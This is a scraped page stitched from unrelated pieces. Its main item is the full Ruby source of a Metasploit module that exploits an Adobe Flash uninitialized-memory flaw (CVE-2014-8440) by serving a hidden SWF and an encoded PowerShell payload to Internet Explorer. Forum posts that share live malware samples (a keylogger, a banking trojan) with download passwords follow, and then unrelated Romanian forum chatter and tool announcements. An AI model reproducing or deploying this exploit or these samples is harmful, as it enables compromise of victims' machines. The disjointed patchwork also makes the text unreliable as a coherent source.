Aerosol

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory', 'Description' => %q{ This module exploits an unintialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nicolas Joly', # Vulnerability discovery 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2014-8440'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-24.html'], ['URL', 'http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html'], ['URL', 'http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' }, :arch => ARCH_X86 }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Nov 11 2014', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-8440', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Source

NOTE: The source code of this project has been released into the public domain and is made available at github.com/decomp. This paper was written for the Final Year Engineering Project at Portsmouth University during the academic session 2014 - 2015. Poster The following poster summarises the project outcomes. It was created for a student project conference which was held at Portsmouth University on the 18th of March 2015. Link: https://github.com/mewpaper/decompilation

mentioned in a nytimes article that schneier linked to. Two samples (prod + dev), for OSX and Win32. Does anti-vm, has some keylogging support, etc. Can't seem to attach, so here's a zippyshare link. Zippyshare.com Pass: infected https://www.virustotal.com/en/file/b27d29f30ecac80e15993fd1ba670bdcfc60f986e60d54e6a0cfb10f1c27bbc9/analysis/1430392133/ https://www.virustotal.com/en/file/48b36cedebe6d883f43b83e677449fc684f1eda4f8d63ab4eaaa3d4877389b85/analysis/1430392219/ Source

Reports by Eset: Unboxing Linux/Mumblehard: Muttering spam from your servers http://www.welivesecurity.com/wp-content/uploads/2015/04/mumblehard.pdf Download Source

Hello, I have attached the sample mentioned in Trendmicro's blogpost. It uses the same technique as the malware in Operation Emmental. Hope the community finds this sample useful More info: TROJ_WERDLOD: Another Banking Trojan Targets Japan https://www.virustotal.com/en/file/c2758245cbe7fe0fa586267f79de36a8960622074f6b95db2d633df31d301363/analysis/ Link: Download Pass: infected Source

ArkDasm ArkDasm is a 64-bit interactive disassembler and debugger for Windows. Supported file types: PE64, raw binary files. Supported processor: x64 architecture (Intel x64 and AMD64) ArkDasm is released as Freeware. Current version: 1.0.0 (April 19, 2015) Main features: parsing PE32+ imports, exports, resources subroutine stack data (arguments, local variables) recognition loading local debug symbols (.pdb file) using DIA multiline comments support bookmarks support python script support possibility to save, load database What's new: added debugger capabilities added new commands: bp, ba switched to the Capstone disasm engine updated Qt to 5.4.0 switched to Visual Studio 2013 minor improvements, bug fixes Link: ArkDasm

@roxorlol ce vrei sa spui prin acest thread ca nu inteleg? Din cate vad ai viteza destul de buna si la Download si la Upload. ( daca viteza de upload e mai mica ca cea de download NU este o problema )

@Dorel6x ti-am trimis eu un cont de al meu, vezi PM!

@Facepalm daca esti atent o sa inveti multe lucruri utile. Sfat util: nu baga in seama orice comentarii rautacioase. On:// Bine ai venit!

Salutare si bun venit pe RST.

@bDyds ti-am zis da-mi PM cu id-ul si discutam mai multe.

@AGSQ da am gresit folosind Proof of concept... vroiam sa zic dovezi.

Salut si bine ai venit, frumoasa prezentare.

@quadxenon te-ai ales cu report pentru offtopic + atac la persoana. + o sa fac comanda de pc nu e treaba ta ceea ce fac eu!

Bilet - Opera?iunea Vanguard Pret: 10€ AUG | Copperhead Pret 1€ USP-S | Blood Tiger Pret: 0,50€ MP9 | Dart Pret: 0,50€ Metoda plata: paypal sau cartela reincarcabila telekom/orange/vodafone. Si multe alte arme detalii in PM!

Pai Windows 7 Ultimate pe 1 PC si 1 Laptop ( pentru gaming ) si Kali Linux ( pentru diferite treburi ) pe un laptop mai vechi.

@albertynos zici ca vrei sa-l folosesti doar ca sa stai pe facebook, youtube? windows XP si foloseste-l in "Safe mode with network,, si nu o sa ai probleme. Va arata ceva de genu: Sau dai Disable visual effects: To change Windows visual effects You can turn specific Windows visual effects on or off. For example, you can display shadows under menus to give a three-dimensional (3-D) effect, indicate folder types with watermarks, and increase the size of icons. You can change some visual effects in Display Properties and others in System Properties in Control Panel. Change visual effects in Display Open Display in Control Panel. On the Appearance tab, click Effects. In the Effects dialog box, select the check box for those items you want to turn on. Note To open Display, click Start, click Control Panel, click Appearance and Themes, and then click Display. For information about a specific item, right-click the item and then click What's This?. Change visual effects in System Open System in Control Panel. On the Advanced tab, under Performance, click Settings. On the Visual Effects tab, click Custom. Select the check box for those items you want to turn on. Clear the check box for the items you want to turn off. Note To open System, click Start, click Control Panel, click Performance and Maintenance, and then click System. Ref to: https://www.winhelp.us/disable-visual-effects-in-windows.html https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/display_change_visual_effects.mspx?mfr=true Ceva util pentru problema ta gasesti si aici: https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/display_change_visual_effects.mspx?mfr=true https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/display_change_visual_effects.mspx?mfr=true Te va ajuta foarte mult.

Hai ba @Twiff ai zis ca o ti privata ce-i asta ?

Bai titlul nu se potriveste "Camatari sau hackeri" dar se potriveste: "Tanar, ningerian & sarac" ) Cat despre email e 100% spam ieftin, sigur sunt multii care pica in plase de genul...

Salut blackguy si bine ai venit in comunitate.

Salut si bine ai venit, desi nu ai postat unde trebuie: Video: -> https://rstforums.com/forum/97780-video-cracking-wpa-wpa2-kali-linux-verbal-step-step-guide.rst

Destul de interesanta stirea ( si tot o data inspaimantatoare ) adica totusi caldura emisa de pc? o.O LOL @quadxenon ce ar fi sa nu mai comentezi aiurea si sa iti vezi de treaba? da sunt mirat fiindca e destul de ingenioasa metoda. Stiu ca am postat si eu de asta am si comentat.

L-am luat eu, baiat de incredere, Recomand!

Nu inteleg de ce va bagati aiurea in thread-ul meu, unu ca dislike-uri, unu ca pretul unu ca nu stiu ce. Frate cititi regulamentul, adica eu sa platesc 200$ si sa-l dau cu 30$ ? pai mai bine il pastrez, eu am pus un pret cine vrea sa cumpere bine cine nu IARA BINE, nu va oblig...

@wildchild Sunt date azi si pm-urile in care injura ca un copil, si toate astea doar pentru ca i-am dat 1 dislike unde merita. )))